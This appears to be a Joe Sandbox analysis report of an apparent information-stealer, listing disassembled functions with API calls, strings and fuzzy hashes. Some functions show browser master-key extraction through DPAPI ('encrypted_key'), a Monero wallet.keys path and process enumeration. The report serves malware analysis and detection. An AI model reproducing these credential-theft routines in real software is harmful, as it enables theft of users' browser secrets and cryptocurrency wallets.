Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
Instruction ID: 8e924cc7790f1010049b493c41eb7505782fca52e2ddc56f7db1e42ff031f46c
Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
Instruction Fuzzy Hash: C051C172900206AFEF298F58C841BBA77A4FF41312F28452DED05975A1E731ED48DBB0

Function 00CDA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00CDA664

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Strings

v20, xrefs: 00CDA571
v10, xrefs: 00CDA5C6
@, xrefs: 00CDA614

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpy
String ID: @$v10$v20
API String ID: 2746078483-278772428
Opcode ID: 689aa9f697d3e7939055aa942db51a0b1553a38a17e224b267ed9f3931aec4e1
Instruction ID: dbf2651c30e2084cb9e58c3c125bc8274b14c882a295ee8f2dd8f9f158998a61
Opcode Fuzzy Hash: 689aa9f697d3e7939055aa942db51a0b1553a38a17e224b267ed9f3931aec4e1
Instruction Fuzzy Hash: 57516C71A1024CEFDB24EFA5CD96FED77B5AF50300F018128FA0A5B291EB706A05DB52

Function 00CDF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Part of subcall function 00CDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CDA13C
Part of subcall function 00CDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CDA161
Part of subcall function 00CDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00CDA181
Part of subcall function 00CDA110: ReadFile.KERNEL32(000000FF,?,00000000,00CD148F,00000000), ref: 00CDA1AA
Part of subcall function 00CDA110: LocalFree.KERNEL32(00CD148F), ref: 00CDA1E0
Part of subcall function 00CDA110: CloseHandle.KERNEL32(000000FF), ref: 00CDA1EA

Part of subcall function 00CE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CE8FE2

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00CF1678,00CF0D93), ref: 00CDF64C
lstrlen.KERNEL32(00000000), ref: 00CDF66B

Strings

^userContextId=4294967295, xrefs: 00CDF69C
moz-extension+++, xrefs: 00CDF6AD

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 1da7e934a019e36a9aa92d21bd56690bddac2a8448a2881d72f7a7a047f4200c
Instruction ID: 6193f75525aeb846205f9f9f96281e39139c14e183dc42133466104df2a92e06
Opcode Fuzzy Hash: 1da7e934a019e36a9aa92d21bd56690bddac2a8448a2881d72f7a7a047f4200c
Instruction Fuzzy Hash: 13514A72D00248AFCB14FBA5DDA2DFE7339AF54300F518568F91667191EE347A08EB62

Function 00CE37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: d6623e6fba86d0d562e6b73e3e4c28884b30e17ba1c9eb453e9bd9a505cefdcb
Instruction ID: bd22df1c410f18db76dfe0b27d1d76edfa80a3d21d79cb1a90a700561d95f3a8
Opcode Fuzzy Hash: d6623e6fba86d0d562e6b73e3e4c28884b30e17ba1c9eb453e9bd9a505cefdcb
Instruction Fuzzy Hash: EF415D71D102899FCB04EFA6D859AFEB778AF14304F008029F51677291EB74AA04DFA2

Function 00CDA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CDA13C
Part of subcall function 00CDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CDA161
Part of subcall function 00CDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00CDA181
Part of subcall function 00CDA110: ReadFile.KERNEL32(000000FF,?,00000000,00CD148F,00000000), ref: 00CDA1AA
Part of subcall function 00CDA110: LocalFree.KERNEL32(00CD148F), ref: 00CDA1E0
Part of subcall function 00CDA110: CloseHandle.KERNEL32(000000FF), ref: 00CDA1EA

Part of subcall function 00CE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CE8FE2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CDA489

Part of subcall function 00CDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CD4F3E,00000000,00000000), ref: 00CDA23F
Part of subcall function 00CDA210: LocalAlloc.KERNEL32(00000040,?,?,?,00CD4F3E,00000000,?), ref: 00CDA251
Part of subcall function 00CDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CD4F3E,00000000,00000000), ref: 00CDA27A
Part of subcall function 00CDA210: LocalFree.KERNEL32(?,?,?,?,00CD4F3E,00000000,?), ref: 00CDA28F

Part of subcall function 00CDA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CDA2D4
Part of subcall function 00CDA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00CDA2F3
Part of subcall function 00CDA2B0: LocalFree.KERNEL32(?), ref: 00CDA323

Strings

"encrypted_key":", xrefs: 00CDA480
DPAPI, xrefs: 00CDA4D9
, xrefs: 00CDA511

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 5e4693345c0337c5572de91307748fa158185736cc1ad00076610a658aa39244
Instruction ID: da4ccdb0a2ce61697308bfa921e2e32ee12e22a2c481c242fc101ed3fa4886d6
Opcode Fuzzy Hash: 5e4693345c0337c5572de91307748fa158185736cc1ad00076610a658aa39244
Instruction Fuzzy Hash: 6C3141B6D0020DABCF04DFE4EC45AEFB7B8AF58300F044519EA15A3241F7319A04CBA2

Function 00CE8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00CF05BF), ref: 00CE885A
Process32First.KERNEL32(?,00000128), ref: 00CE886E
Process32Next.KERNEL32(?,00000128), ref: 00CE8883

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

CloseHandle.KERNEL32(?), ref: 00CE88F1

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 0bbbba80f765bef06b325c88807a7307850af01cb0c2e73b2e03bbcbbe9ce20a
Instruction ID: 092d9a72cfbae72fa0941ec26da3da73c6ce20bc29838bfc650c6f94804377cf
Opcode Fuzzy Hash: 0bbbba80f765bef06b325c88807a7307850af01cb0c2e73b2e03bbcbbe9ce20a
Instruction Fuzzy Hash: 4C314DB1901258AFCB24EF96CC51FEEB778EB45700F1041A9F10EA61A0DB306A44DFA1

Function 00D4FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D4FE13
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D4FE2C

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
Instruction ID: 9b22f8edfa1dc0110154a17cac18c52c2ed431443296e05b321148e91fe419c8
Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
Instruction Fuzzy Hash: 89017136109721AFFE3427789CC9A6A2694EB017B7738433AF916851F2EF528C459170

Function 00CE7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CF0DE8,00000000,?), ref: 00CE7B40
RtlAllocateHeap.NTDLL(00000000), ref: 00CE7B47
GetLocalTime.KERNEL32(?,?,?,?,?,00CF0DE8,00000000,?), ref: 00CE7B54
wsprintfA.USER32 ref: 00CE7B83

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 2fad944707f92bfa41ee52e9ffca0ba6d7758074257317b2792f972132fb599a
Instruction ID: 3096ee175325cee1f873daeedb77801de2681baf85629b0c53809f75a27095fc
Opcode Fuzzy Hash: 2fad944707f92bfa41ee52e9ffca0ba6d7758074257317b2792f972132fb599a
Instruction Fuzzy Hash: 79112EB2908218ABCB14DBCADD45FBFB7F8EB4DB11F10411AF605A2280D3395940D770

Function 00CE9470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00CE3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00CE3D3E,?), ref: 00CE948C
GetFileSizeEx.KERNEL32(000000FF,00CE3D3E), ref: 00CE94A9
CloseHandle.KERNEL32(000000FF), ref: 00CE94B7

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: d7396aeb0a3cf05d743b05cde530ccd6a5e0b2f3e892c8808af726ae7318bed3
Instruction ID: 0021574987ee0e6be6b03b345d9a2badd09ec207b240c97165f0468a140b463e
Opcode Fuzzy Hash: d7396aeb0a3cf05d743b05cde530ccd6a5e0b2f3e892c8808af726ae7318bed3
Instruction Fuzzy Hash: 9EF04F79E04308BBDB10EFB1EC49F9E77B9EB48710F10C654FA11A72C0D67096019B80

Function 00CECA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00CECA7E

Part of subcall function 00CEC2A0: __amsg_exit.LIBCMT ref: 00CEC2B0

__getptd.LIBCMT ref: 00CECA95
__amsg_exit.LIBCMT ref: 00CECAA3
__updatetlocinfoEx_nolock.LIBCMT ref: 00CECAC7

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: ce829a8cd8ebb0916a8745c13a7772289ad95f6737e128da766fd507dac649c3
Instruction ID: 675efb8b2ee6a3a3cc76fdaa883f07d35f366ae898a9d70bd776ff135df4ee1e
Opcode Fuzzy Hash: ce829a8cd8ebb0916a8745c13a7772289ad95f6737e128da766fd507dac649c3
Instruction Fuzzy Hash: 3FF02432A403989BD720FBBB988376F33A0AF00724F110159F114AA1D2CF205D42FB92

Function 00D504D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 00D505DE

Strings

MOC, xrefs: 00D5050A
